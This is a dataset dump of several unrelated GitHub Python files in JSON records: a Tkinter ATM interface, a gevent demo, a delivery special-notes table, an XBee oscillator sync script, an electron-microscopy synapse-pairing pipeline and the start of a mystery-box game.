账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"点击“确定”冻结银行卡\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=230, y=270)\r\n self.widget_list.append(lb2)\r\n\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_freeze_card())\r\n self.widget_list.append(bt1)\r\n\r\n def page_account_cancellation(self, card_number, balance):\r\n self.clear_page()\r\n self.bt_b1_t.set(\"退卡\")\r\n self.set_fnc(\"b1\", lambda event: self.fnc_refund_card())\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_count(card_number, balance))\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"卡号:%d 账户余额:%.2f\" % (card_number, balance),\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=20, y=20)\r\n self.widget_list.append(lb1)\r\n\r\n lb2 = tkinter.Label(self.screen_m,\r\n text=\"点击“确定”进行销户\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"center\")\r\n lb2.place(x=230, y=270)\r\n self.widget_list.append(lb2)\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=300, y=310)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_account_cancellation())\r\n self.widget_list.append(bt1)\r\n\r\n def page_unfreeze_card(self):\r\n self.clear_page()\r\n self.bt_r4_t.set(\"返回\")\r\n self.set_fnc(\"r4\", lambda event: self.page_home())\r\n\r\n lb1 = tkinter.Label(self.screen_m,\r\n text=\"请输入解冻卡号:\",\r\n bg=self.background_color, fg=self.font_color,\r\n font=(\"黑体\", 15),\r\n anchor=\"ne\")\r\n lb1.place(x=180, y=260)\r\n self.widget_list.append(lb1)\r\n e1 = tkinter.Entry(self.screen_m, font=(\"黑体\", 12))\r\n e1.place(x=350, y=263)\r\n self.widget_list.append(e1)\r\n bt1 = tkinter.Button(self.screen_m,\r\n text=\"确认\",\r\n font=(\"黑体\", 12),\r\n width=10, height=2)\r\n bt1.place(x=320, y=330)\r\n bt1.bind(\"\",\r\n lambda event: self.fnc_unfreeze_card(eval(e1.get())))\r\n self.widget_list.append(bt1)\r\n\r\n def page_card_reissue(self):\r\n self.clear_page()\r\n pass\r\n\r\n def loop(self):\r\n self.main_window.mainloop()\r\n pass\r\n\r\n def __new__(cls, *args, **kwargs):\r\n if not hasattr(cls, \"instance\"):\r\n cls.instance = super(ATMGui, cls).__new__(cls)\r\n return cls.instance\r\n\r\n\r\nclass OPGui(object):\r\n pass\r\n\r\n\r\n# 测试用\r\ndef dfnc():\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n gui = ATMGui(dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc, dfnc)\r\n # gui.page_home()\r\n # gui.page_open_count()\r\n gui.page_count(10000000, 15)\r\n # gui.page_withdrawal(10000000, 15)\r\n # gui.page_deposit(10000000, 15)\r\n # gui.page_change_password(10000000, 15)\r\n # gui.page_transfer_accounts(10000000, 15)\r\n # gui.page_freeze_card(10000000, 15)\r\n gui.loop()\r\n pass\r\n","repo_name":"DMdamao/BJ-Python-GP-1","sub_path":"py-basis/各组银行系统带界面/第二组/ATM/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":33974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41130272745","text":"\"\"\"\n using group.map to get result.\n result from imap is in order(add order), imap_unordered has no order\n Author: xiangtian.hu\n Date: 2017-8-4\n\"\"\"\nfrom gevent import getcurrent\nfrom gevent.pool import Group\ngroup = Group()\n\n\ndef hello_from(n):\n print('Size of group %s' % len(group))\n print('Hello from Greenlet %s' % id(getcurrent()))\n return n\n\n# Could use \"imap\" replace of map, imap return a iterable\nx = group.map(hello_from, range(3))\nprint(type(x))\nprint(x)","repo_name":"xiangtian/pytest","sub_path":"gevent/gevent_group2.py","file_name":"gevent_group2.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11380190851","text":"\nclass SpecialNote:\n def __init__(self, package_id, note):\n self.package_id = package_id\n self.note = note\n\n\nclass SpecialNotesTable:\n # requirements is a list of tuples of form (package_id, special_note_string)\n def __init__(self):\n self.truck_notes = []\n self.delayed_notes = []\n self.delivery_notes = []\n self.address_notes = []\n\n def put(self, package_id_number, note):\n # Creates a SpecialNote and puts it into a table.\n # new_string only contains the important information of the string\n note_string = note\n if \"Can only be on truck\" in note_string:\n new_string = note_string[21:]\n note_to_add = SpecialNote(package_id_number, new_string)\n self.truck_notes.append(note_to_add)\n elif \"Delayed on flight\" in note_string:\n new_string = note_string[51:]\n note_to_add = SpecialNote(package_id_number, new_string)\n self.truck_notes.append(note_to_add)\n elif \"Must be delivered with\" in note_string:\n new_string = note_string[23:]\n # stores package ID's of packages that the package must be delivered with as a list\n packages_that_package_must_be_delivered_with = str.split(new_string, sep=\",\")\n note_to_add = SpecialNote(package_id_number, packages_that_package_must_be_delivered_with)\n self.truck_notes.append(note_to_add)\n elif \"Wrong address\" in note_string:\n new_string = \"Wrong address\"\n note_to_add = SpecialNote(package_id_number, new_string)\n self.truck_notes.append(note_to_add)\n\n def update(self, package_id, note):\n # if note exists in one of the tables, then deletes it and puts in new note\n\n truck_notes = self.truck_notes[:]\n for i in range(len(truck_notes)):\n if truck_notes[i].package_id == package_id:\n del self.truck_notes[i]\n self.put(package_id, note)\n return\n\n delayed_notes = self.delayed_notes[:]\n for i in range(len(delayed_notes)):\n if delayed_notes[i].package_id == package_id:\n del self.delayed_notes[i]\n self.put(package_id, note)\n return\n\n delivery_notes = self.delivery_notes[:]\n for i in range(len(delivery_notes)):\n if delivery_notes[i].package_id == package_id:\n del self.delivery_notes[i]\n self.put(package_id, note)\n return\n\n address_notes = self.truck_notes[:]\n for i in range(len(address_notes)):\n if address_notes[i].package_id == package_id:\n del self.address_notes[i]\n self.put(package_id, note)\n return\n\n self.put(package_id, note)\n return","repo_name":"tmax7/Data_Structures_and_Algorithms_II_project","sub_path":"specialnotes.py","file_name":"specialnotes.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8682220383","text":"\r\n\r\nglobal Xbee\r\n\r\nimport time\r\nimport serial\r\n\r\nXbee = serial.Serial('/dev/ttyUSB0', 115200)\r\n\r\n\r\nsyncLimit = 360 #Degree Limit of oscillator\r\ncycleTime = 10 #Length (in seconds) of oscillator cycle\r\nfrequency = syncLimit/cycleTime #Cycle Rate (in degrees per second)\r\ntime_base = time.time()\r\nheading = float(input(\"Please enter robot heading: \"));\r\n\r\n\r\nwhile True:\r\n try:\r\n timeDiff = (time.time() - time_base)\r\n \r\n currentPhase = heading + timeDiff * frequency\r\n \r\n if currentPhase >= syncLimit:\r\n message = '1' # Encoded message for the Xbee to send\r\n Xbee.write(message.encode()) # Encodes the message\r\n print(\"You sent a pulse\")\r\n print(currentPhase)\r\n\r\n time_base += cycleTime #Increases threshold\r\n\r\n\r\n\r\n\r\n if Xbee.inWaiting() > 0: #If the Xbee receives a message\r\n message = Xbee.read(Xbee.inWaiting()).decode() #Decodes and reads the data\r\n\r\n #Find difference between time of receiving pulse vs. time of next threshold\r\n #timeDiff = (time.time() - time_base)-cycleTime\r\n\r\n #currentPhase = currentPhase-(timeDiff*frequency*0.5) #Shifts phase forward by half of the difference.\r\n #time_base += timeDiff*0.5 \r\n if timeDiff >= cycleTime/2:\r\n heading =+ (syncLimit - currentPhase)/2\r\n elif timeDiff < cycleTime/2:\r\n heading =- (syncLimit - currentPhase)/2\r\n\r\n except KeyboardInterrupt:\r\n print('Connection Terminated')\r\n break\r\n","repo_name":"mathman93/SPRI2020_Roomba","sub_path":"Cisco Code/PCO_Sync.py","file_name":"PCO_Sync.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20638046508","text":"'''Given vesicle cloud and synaptic junction predictions and a segmented volume, perform synapse pairing.'''\nfrom copy import copy\nimport numpy as np\nimport neuroglancer\nimport networkx as nx\nimport pickle\nfrom cloudvolume import CloudVolume\nfrom cloudvolume.lib import Bbox\nimport json\nfrom scipy import ndimage\nimport h5py\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nfrom ffn.utils import bounding_box\nfrom pprint import pprint\nimport pandas as pd\nfrom tqdm.auto import tqdm\nimport logging\nimport argparse\nfrom scipy.ndimage.measurements import find_objects, center_of_mass\nfrom em_mask.precomputed_utils import ffn_to_cv, get_chunk_bboxes, prepare_precomputed\n\nimport os\ntqdm.pandas()\n\nfrom skimage.segmentation import find_boundaries, watershed\nimport fastremap\n\nfrom mpi4py import MPI\ntqdm.monitor_interval = 0\nmpi_comm = MPI.COMM_WORLD\nmpi_rank = mpi_comm.Get_rank()\nmpi_size = mpi_comm.Get_size()\n\n# def ffn_to_cv(ffn_bb):\n# '''Convert ffn style bbox to cloudvolume style.'''\n# offset = np.array(ffn_bb.start)\n# size = np.array(ffn_bb.size)\n# return Bbox(a=offset, b=offset+size)\n\n# def get_chunk_bboxes(\n# union_bbox, \n# chunk_size, \n# overlap,\n# include_small_sub_boxes=True,\n# back_shift_small_sub_boxes=False):\n# '''Use ffn bbox calculator to generate overlapping cloudvolume bbox.'''\n# ffn_style_bbox = bounding_box.BoundingBox(\n# np.array(union_bbox.minpt), np.array(union_bbox.size3()))\n\n# calc = bounding_box.OrderlyOverlappingCalculator(\n# outer_box=ffn_style_bbox, \n# sub_box_size=chunk_size, \n# overlap=overlap, \n# include_small_sub_boxes=include_small_sub_boxes,\n# back_shift_small_sub_boxes=back_shift_small_sub_boxes)\n\n# bbs = [ffn_to_cv(ffn_bb) for ffn_bb in calc.generate_sub_boxes()]\n# return bbs\n\ndef get_pos(seg_id, vc_id, overlap, offset):\n pos = np.stack(np.where(np.logical_and(overlap[..., 0] == seg_id, overlap[..., 1] == vc_id)), axis=1)\n med_pos = np.median(pos, axis=0)\n return med_pos + offset\n\ndef keep_max_generic(df, group_name, value_name):\n '''Remove dup group_name rows and keep the max according to value_name'''\n idx = df.groupby([group_name], sort=False)[value_name].transform(max) == df[value_name]\n return df[idx]\n\n\ndef get_all_poses(seg_id, vc_id, overlap, offset):\n sel_mask = np.logical_and(overlap[..., 0] == seg_id, overlap[..., 1] == vc_id)\n pos = np.stack(np.where(sel_mask), axis=1)\n med_pos = np.median(pos, axis=0) + offset\n min_pos = np.min(pos, axis=0) + offset\n max_pos = np.max(pos, axis=0) + offset\n return med_pos, min_pos, max_pos\n\ndef find_vc_fast(seg_chunk, mask_chunk, vc_chunk, offset, vc_thresh=30, size_thresh=500):\n '''For seg_chunk, find all pre synaptic vc sites and find matching post synaptic partner'''\n # mask chunk 1 soma 2 vessel\n vc_chunk[np.isin(mask_chunk, [1, 2])] = 0\n vc_chunk = ndimage.gaussian_filter(vc_chunk, sigma=(2, 2, 1))\n vc_chunk[seg_chunk == 0] = 0\n\n vc_mask = vc_chunk > vc_thresh\n vc_seeds, _ = ndimage.label(vc_chunk > vc_thresh * 2)\n vc_labels = watershed(-vc_chunk, markers=vc_seeds, mask=vc_mask, \n connectivity=np.ones((3,3,3)))\n \n overlap = np.stack([seg_chunk, vc_labels], axis=-1)\n valid_overlaps = overlap[np.logical_and(overlap[..., 0] != 0, overlap[..., 1] != 0), :]\n if not valid_overlaps.shape[0]:\n return None, vc_labels\n uni_pairs, uni_counts = np.unique(valid_overlaps, axis=0, return_counts=True)\n \n\n pair_count_entry = [\n {'seg_id': k[0],\n 'vc_id': k[1],\n 'vc_size': v} for k, v in zip(uni_pairs, uni_counts) if k[0] != 0 and k[1] != 0 and v > size_thresh]\n \n if not len(pair_count_entry):\n return None, vc_labels\n\n seg_vc_df = pd.DataFrame(pair_count_entry)\n seg_vc_df = keep_max_generic(seg_vc_df, 'vc_id', 'vc_size')\n\n # get position with scipy.ndimage.measure\n valid_keys = seg_vc_df['vc_id']\n objs = find_objects(vc_labels)\n cofm = center_of_mass(vc_mask, vc_labels, valid_keys)\n\n pos_entries = {}\n for i, k in enumerate(valid_keys):\n slc = objs[k - 1]\n vc_min = np.array([slc[0].start, slc[1].start, slc[2].start]) + offset\n vc_max = np.array([slc[0].stop, slc[1].stop, slc[2].stop]) + offset\n vc_center = np.round(cofm[i] + offset)\n pos_entries[k] = [vc_center, vc_min, vc_max]\n # print(i, k, pos_entries[k])\n\n seg_vc_df['vc_pos'], seg_vc_df['vc_min_pos'], seg_vc_df['vc_max_pos'] = zip(\n *seg_vc_df.apply(lambda row: pos_entries[row.vc_id], axis=1))\n \n return seg_vc_df, vc_labels\n\n \ndef find_vc(seg_chunk, mask_chunk, vc_chunk, offset, vc_thresh=30, size_thresh=500):\n '''For seg_chunk, find all pre synaptic vc sites and find matching post synaptic partner'''\n # mask chunk 1 soma 2 vessel\n vc_chunk[np.isin(mask_chunk, [1, 2])] = 0\n vc_chunk = ndimage.gaussian_filter(vc_chunk, sigma=(2, 2, 1))\n\n vc_chunk[seg_chunk == 0] = 0\n\n vc_mask = vc_chunk > vc_thresh\n vc_seeds, _ = ndimage.label(vc_chunk > vc_thresh * 2)\n vc_labels = watershed(-vc_chunk, markers=vc_seeds, mask=vc_chunk > vc_thresh, \n connectivity=np.ones((3,3,3)))\n \n overlap = np.stack([seg_chunk, vc_labels], axis=-1)\n valid_overlaps = overlap[np.logical_and(overlap[..., 0] != 0, overlap[..., 1] != 0), :]\n if not valid_overlaps.shape[0]:\n return None, vc_labels\n uni_pairs, uni_counts = np.unique(valid_overlaps, axis=0, return_counts=True)\n \n\n pair_count_entry = [\n {'seg_id': k[0],\n 'vc_id': k[1],\n 'vc_size': v} for k, v in zip(uni_pairs, uni_counts) if k[0] != 0 and k[1] != 0 and v > size_thresh]\n \n if not len(pair_count_entry):\n return None, vc_labels\n\n \n seg_vc_df = pd.DataFrame(pair_count_entry)\n seg_vc_df = keep_max_generic(seg_vc_df, 'vc_id', 'vc_size')\n seg_vc_df['vc_pos'], seg_vc_df['vc_min_pos'], seg_vc_df['vc_max_pos'] = zip(*seg_vc_df.apply(\n lambda row: get_all_poses(row.seg_id, row.vc_id, overlap, offset), axis=1))\n \n return seg_vc_df, vc_labels\n\n \ndef get_neighbors(mask, labels, border_thickness=(5, 5, 2), min_size=100, max_neighbor_count=3):\n '''For a binary mask, find it's neibhor ids in labels.'''\n bin_struct = ndimage.generate_binary_structure(3, 1)\n xy_struct = bin_struct.copy()\n xy_struct[:, :, 0] = 0\n xy_struct[:, :, 2] = 0\n z_struct = np.zeros_like(bin_struct)\n z_struct[1, 1, :] = 1\n \n mask_border = ndimage.binary_dilation(mask, structure=xy_struct, iterations=border_thickness[0])\n mask_border = ndimage.binary_dilation(mask_border, structure=z_struct, iterations=border_thickness[2])\n mask_border[mask > 0] = 0\n labels_on_border = np.where(mask_border > 0, labels, 0)\n uni, counts = np.unique(labels_on_border, return_counts=True)\n valid = np.logical_and(uni != 0, counts > min_size)\n uni, counts = uni[valid], counts[valid]\n \n if len(uni) > max_neighbor_count:\n order = np.argsort(counts)[::-1]\n uni, counts = uni[order][:max_neighbor_count], counts[order][:max_neighbor_count]\n \n results = []\n for u, c in zip(uni, counts):\n pos = np.median(np.stack(np.where(labels_on_border == u), axis=1), axis=0)\n results.append({\n 'id': u,\n 'size': c,\n 'pos': pos\n })\n return results\ndef find_sj(seg_vc_df, seg_chunk, vc_labels, mask_chunk, sj_chunk, offset, \n sj_thresh=30, pad=(3, 3, 2), border_thickness=(5, 5, 2), min_sj_size=25, max_neighbor_count=3):\n '''Find sj partner for each vc'''\n line_annos = []\n offset = np.array(offset)\n pad = np.array(pad) # pad bbox around vc object\n valid_pair_entries = []\n seg_ids_with_vc = np.array((seg_vc_df['seg_id']))\n \n sj_chunk[np.isin(mask_chunk, [1, 2])] = 0\n sj_chunk = ndimage.gaussian_filter(sj_chunk, sigma=(1, 1, 0))\n sj_seeds, _ = ndimage.label(sj_chunk > sj_thresh * 2)\n sj_labels = watershed(-sj_chunk, markers=sj_seeds, mask=sj_chunk > sj_thresh, \n connectivity=np.ones((3,3,3)))\n\n input_bb = Bbox((0, 0, 0), seg_chunk.shape)\n \n for ind, row in tqdm(seg_vc_df.iterrows(), total=len(seg_vc_df), disable=True):\n pos = (row.vc_pos - offset).astype(np.int32)\n\n vc_bbox = Bbox(row.vc_min_pos - offset - pad, row.vc_max_pos - offset + pad)\n inter_bb = Bbox.intersection(input_bb, vc_bbox)\n if np.product(inter_bb.size3()) == 0: \n continue\n local_slc = inter_bb.to_slices()\n local_offset = offset + inter_bb.minpt\n \n local_vc_labels = vc_labels[local_slc]\n local_vc_mask = local_vc_labels == row.vc_id\n local_sj_chunk = sj_chunk[local_slc]\n local_sj_labels = sj_labels[local_slc]\n \n sj_entries = get_neighbors(local_vc_mask, local_sj_labels, \n border_thickness, min_sj_size, max_neighbor_count)\n if not len(sj_entries):\n continue\n for s in sj_entries:\n mean_sj_value = np.mean(local_sj_chunk[local_sj_labels == s['id']])\n norm_size = s['size'] * min(mean_sj_value / 128.0, 1.0)\n if norm_size < min_sj_size:\n continue\n valid_pair_entries.append({\n 'pre_seg_id': row.seg_id,\n 'vc_id': row.vc_id,\n 'vc_pos': row.vc_pos,\n 'vc_size': row.vc_size,\n 'sj_id': s['id'],\n 'sj_pos': s['pos'] + local_offset,\n 'sj_size': s['size'],\n 'sj_norm_size': norm_size,\n 'sj_value': mean_sj_value\n })\n synapse_df = pd.DataFrame(valid_pair_entries)\n if not len(synapse_df):\n return None, sj_labels\n synapse_df = keep_max_generic(synapse_df, 'sj_id', 'sj_size')\n return synapse_df, sj_labels\n\n\ndef get_angle_old(a, b, c):\n ba = a - b\n bc = c - b\n base = np.linalg.norm(ba) * np.linalg.norm(bc)\n if base == 0:\n return 0\n cosine_angle = np.dot(ba, bc) / base\n angle = np.arccos(cosine_angle)\n return np.degrees(angle)\ndef get_angle(a, b, c):\n ba = a - b\n bc = c - b\n sign = np.sign(np.dot(ba, bc))\n base = np.dot(ba, ba) * np.dot(bc, bc)\n # base = np.linalg.norm(ba) * np.linalg.norm(bc)\n if base == 0:\n return 0\n cos = sign * np.sqrt(np.dot(ba, bc) ** 2 / base)\n return np.degrees(np.arccos(cos))\n # cosine_angle = np.dot(ba, bc) / base\n # angle = np.arccos(cosine_angle)\n # return np.degrees(angle)\n\n\ndef find_post_syn(synapse_df, seg_chunk, sj_labels, offset, \n rad=(50, 50, 10), max_angle=90.0, border_thickness=(3, 3, 2)):\n input_bb = Bbox((0, 0, 0), seg_chunk.shape)\n synapse_entries = []\n pre_seg_ids = synapse_df.index\n for ind, row in tqdm(synapse_df.iterrows(), total=len(synapse_df), disable=True):\n pos = (row.sj_pos - offset).astype(np.int32)\n inter_bb = Bbox.intersection(input_bb, Bbox(pos - rad, pos + rad))\n if np.product(inter_bb.size3()) == 0: \n continue\n local_slc = inter_bb.to_slices()\n local_offset = offset + inter_bb.minpt\n \n local_sj_labels = sj_labels[local_slc]\n local_sj_mask = local_sj_labels == row.sj_id\n local_seg_chunk = seg_chunk[local_slc]\n \n post_seg_entries = get_neighbors(local_sj_mask, local_seg_chunk, \n border_thickness=border_thickness, min_size=5)\n pre_seg_entry = [ps for ps in post_seg_entries if ps['id'] == row.pre_seg_id]\n if len(pre_seg_entry) < 1:\n # if cannot find pre_seg_id in neighbor, which is rare, use vc_pos as pre pos\n pre_pos = np.array(row.vc_pos)\n else:\n # if can find pre_seg_id in neighbor, use the median as pre seg pos\n pre_pos = pre_seg_entry[0]['pos'] + local_offset\n post_seg_entries = [ps for ps in post_seg_entries if ps['id'] != row.pre_seg_id and ps['id'] not in pre_seg_ids]\n\n \n # chose the largest one that forms obtuse angle vc - sj - post\n for ps in post_seg_entries:\n ps['angle'] = get_angle(pre_pos, row.sj_pos, ps['pos'] +local_offset) \n # logging.warning('pos %s', ps['pos'])\n # if np.isnan(ps['angle']):\n # logging.warning('failed at %s, %s, %s', pre_pos, ps['pos'])\n # logging.warning('failed at %s, %s, %s', pre_pos, row.sj_pos, ps['pos'] + local_offset)\n # return\n post_seg_entries = [ps for ps in post_seg_entries if ps['angle'] > max_angle]\n if not post_seg_entries: continue\n # each sj can only have one post syn seg partner\n max_ps = max(post_seg_entries, key=lambda ps: ps['size'])\n post_pos = max_ps['pos'] + local_offset \n\n synapse_entries.append({\n 'pre_seg_id': row.pre_seg_id,\n 'post_seg_id': max_ps['id'],\n 'vc_id': row.vc_id,\n 'vc_pos': row.vc_pos,\n 'vc_size': row.vc_size,\n 'sj_id': row.sj_id,\n 'sj_pos': row.sj_pos.tolist(),\n 'sj_size': row.sj_size,\n 'sj_norm_size': row.sj_norm_size,\n 'sj_value': row.sj_value,\n 'pre_seg_pos': pre_pos.tolist(),\n 'post_seg_pos': post_pos.tolist()\n })\n new_synapse_df = pd.DataFrame(synapse_entries)\n line_annos = [neuroglancer.LineAnnotation(\n point_a=row.vc_pos,\n point_b=row.post_seg_pos,\n id=ind) for ind, row in new_synapse_df.iterrows()]\n return new_synapse_df, line_annos\n\ndef analyze_synapse(\n segmentation_vol, vc_vol, sj_vol, mask_vol, mask_mip,\n output_dir, chunk_size, overlap, offset, size):\n '''\n segmentaion, vc, sj are by default at same mip level\n '''\n vc_thresh = 5\n sj_thresh = 5\n chunk_size = np.array(chunk_size)\n overlap = np.array(overlap)\n if mpi_rank == 0:\n os.makedirs(output_dir, exist_ok=True)\n cv_args = dict(progress=False, parallel=False, fill_missing=True, bounded=False)\n seg_cv = CloudVolume('file://%s' % segmentation_vol, mip=0, **cv_args)\n vc_cv = CloudVolume('file://%s' % vc_vol, mip=0, **cv_args)\n sj_cv = CloudVolume('file://%s' % sj_vol, mip=0, **cv_args)\n mask_cv = CloudVolume('file://%s' % mask_vol, mip=mask_mip, **cv_args)\n if offset is None or size is None:\n union_bb = Bbox.intersection(seg_cv.meta.bounds(0), vc_cv.meta.bounds(0))\n offset = union_bb.minpt\n size = union_bb.size3()\n offset = np.array(offset)\n size = np.array(size)\n print(offset, size)\n\n union_bb = Bbox(offset, offset + size)\n print(union_bb)\n bbs = get_chunk_bboxes(union_bb, chunk_size, overlap)\n print(len(bbs))\n all_inds = np.arange(len(bbs))\n np.random.shuffle(all_inds)\n sub_inds = np.array_split(all_inds, mpi_size)\n # sub_bbs = np.array_split(bbs, mpi_size)\n else:\n seg_cv = None\n vc_cv = None\n sj_cv = None\n mask_cv = None\n bbs = None\n sub_inds = None\n # sub_bbs = None\n\n seg_cv = mpi_comm.bcast(seg_cv, 0)\n vc_cv = mpi_comm.bcast(vc_cv, 0)\n sj_cv = mpi_comm.bcast(sj_cv, 0)\n mask_cv = mpi_comm.bcast(mask_cv, 0)\n # sub_bbs = mpi_comm.scatter(sub_bbs, 0)\n bbs = mpi_comm.bcast(bbs, 0)\n sub_inds = mpi_comm.scatter(sub_inds, 0)\n \n padding = overlap // 2\n all_vc_dfs = []\n all_syn_dfs = []\n # for ind, bb in tqdm(enumerate(sub_bbs), total=len(sub_bbs), desc='iterate bbs'):\n for ind in tqdm(sub_inds, total=len(sub_inds), desc='iterate bbs'):\n bb = bbs[ind]\n bb = Bbox(bb.minpt + padding, bb.maxpt - padding)\n offset = bb.minpt\n seg_chunk = np.array(seg_cv[bb])[..., 0]\n vc_chunk = np.array(vc_cv[bb])[..., 0]\n sj_chunk = np.array(sj_cv[bb])[..., 0]\n mask_chunk = np.array(mask_cv[bb])[..., 0]\n if np.logical_or.reduce(seg_chunk.ravel()) == 0:\n continue\n\n vc_df, vc_labels = find_vc_fast(\n seg_chunk, mask_chunk, vc_chunk, offset, \n vc_thresh=vc_thresh, size_thresh=100)\n if vc_df is None:\n continue\n all_vc_dfs.append(vc_df)\n\n pre_synapse_df, sj_labels = find_sj(\n vc_df, seg_chunk, vc_labels, mask_chunk, sj_chunk, offset, \n pad=(3, 3, 2), border_thickness=(3, 3, 2), min_sj_size=60, \n max_neighbor_count=3)\n if pre_synapse_df is None:\n continue\n synapse_df, sj_psd_annos = find_post_syn(pre_synapse_df, seg_chunk, sj_labels, \n offset, rad=(20, 20, 3), max_angle=60.0, border_thickness=(3, 3, 2))\n\n\n if len(synapse_df):\n cube_df_path = os.path.join(output_dir, 'synapse_%d_%d_%d.csv' % (offset[0], offset[1], offset[2]))\n synapse_df = synapse_df.set_index(['pre_seg_id', 'post_seg_id'])\n synapse_df.to_csv(cube_df_path)\n\n all_syn_dfs.append(synapse_df)\n\n mpi_comm.barrier()\n logging.warning('rank %d reached', mpi_rank)\n all_vc_dfs = mpi_comm.reduce(all_vc_dfs, MPI.SUM, 0)\n all_syn_dfs = mpi_comm.reduce(all_syn_dfs, MPI.SUM, 0)\n if mpi_rank == 0:\n all_vc_df = pd.concat(all_vc_dfs)\n vc_out_path = os.path.join(output_dir, 'vc.csv')\n all_vc_df.to_csv(vc_out_path)\n\n all_syn_df = pd.concat(all_syn_dfs)\n syn_out_path = os.path.join(output_dir, 'synapse.csv')\n all_syn_df.to_csv(syn_out_path)\n \n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"segmentation_vol\", type=str, help=\"segmentation volume\")\n parser.add_argument(\"vc_vol\", type=str, help=\"vc volume\")\n parser.add_argument(\"sj_vol\", type=str, help=\"sj volume\")\n parser.add_argument(\"--mask_vol\", type=str, help=\"mask volume\")\n parser.add_argument(\"--mask_mip\", default=0, type=int, help=\"mask mip\")\n parser.add_argument(\"--output_dir\", type=str, default=None)\n parser.add_argument(\"--chunk_size\", type=str, default='512,512,128')\n parser.add_argument(\"--overlap\", type=str, default='32,32,16')\n parser.add_argument(\"--offset\", type=str, default=None)\n parser.add_argument(\"--size\", type=str, default=None)\n\n # params to control syn finding\n\n args = parser.parse_args()\n chunk_size = [int(i) for i in args.chunk_size.split(',')]\n overlap = [int(i) for i in args.overlap.split(',')]\n if args.offset:\n offset = [int(i) for i in args.offset.split(',')]\n else:\n offset = None\n \n if args.size:\n size = [int(i) for i in args.size.split(',')]\n else:\n size = None\n\n analyze_synapse(args.segmentation_vol, args.vc_vol, args.sj_vol, \n args.mask_vol, args.mask_mip,\n args.output_dir, chunk_size, overlap, offset, size)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Hanyu-Li/EM_mask","sub_path":"em_mask/synapse/analyze_synapse.py","file_name":"analyze_synapse.py","file_ext":"py","file_size_in_byte":17504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15939205619","text":"repostas = []\n\nfor _ in range(5):\n\n x, y = input(\"Digite os valores de x,y separados por uma virgula: \").split(\",\")\n\n z = (int(x)*int(y)) + 5\n\n if z <= 0:\n resposta = 'A'\n elif z <= 100:\n resposta = 'B'\n else:\n resposta = 'C'\n\n repostas.append((z, resposta))\n\nfor resp in repostas:\n print(resp)\n\n","repo_name":"peustratt/python-exercises","sub_path":"introducao_algoritmos_pensamento_computacional/lista_03_condicionais/exercicio_01.py","file_name":"exercicio_01.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6552248788","text":"from tkinter import *\n\nfrom functools import partial # to prevent unwanted windows\nimport random\n\n\nclass Start:\n def __init__(self,parent):\n\n # GUI to get starting balance and stakes\n self.start_frame = Frame(padx=10, pady=10)\n self.start_frame.grid()\n\n # mystery heading (row 0)\n self.mystery_box_label = Label(self.start_frame, text=\"Mystery Box Game\",\n font=\"Garamond 19 bold\")\n self.mystery_box_label.grid(row=1)\n\n # entry box (row 1)\n self.start_amount_entry = Entry(self.start_frame, font=\"Arial 16 bold\")\n self.start_amount_entry.grid(row=2)\n\n # button frame\n self.start_button_frame = Frame(self.start_frame)\n self.start_button_frame.grid(row=3, pady=10)\n\n # play button (row 2)\n self.lowstakes_button = Button(self.start_button_frame, text=\"Low ($5)\",\n highlightbackground=\"orange\",\n command=lambda: self.to_game(1))\n self.lowstakes_button.grid(row=0, column=0, pady=10)\n\n # play button (row 3)\n self.medstakes_button = Button(self.start_button_frame, text=\"Medium ($10)\",\n highlightbackground=\"yellow\",\n command=lambda: self.to_game(1))\n self.medstakes_button.grid(row=0, column=1, pady=10)\n\n # play button (row 4)\n self.highstakes_button = Button(self.start_button_frame, text=\"High ($15)\",\n highlightbackground=\"green\",\n command=lambda: self.to_game(1))\n self.highstakes_button.grid(row=0, column=2, pady=10)\n\n def to_game(self, stakes):\n starting_balance = self.start_amount_entry.get()\n Game(self, stakes, starting_balance)\n\n\nclass Game:\n def __init__(self, partner, stakes, starting_balance):\n print(stakes)\n print(starting_balance)\n\n def reveal_boxes(self):\n # retrieve the balance from the initial function\n current_balance = self.balance.get()\n\n # adjust the balance (subtract game cost and add pay out)\n # for testing purposes, just add 2\n current_balance += 2\n\n # set balance to adjusted balance\n self.balance.set(current_balance)\n\n # edit label so user can see their balance\n self.balance_label.configure(text=\"Balance: 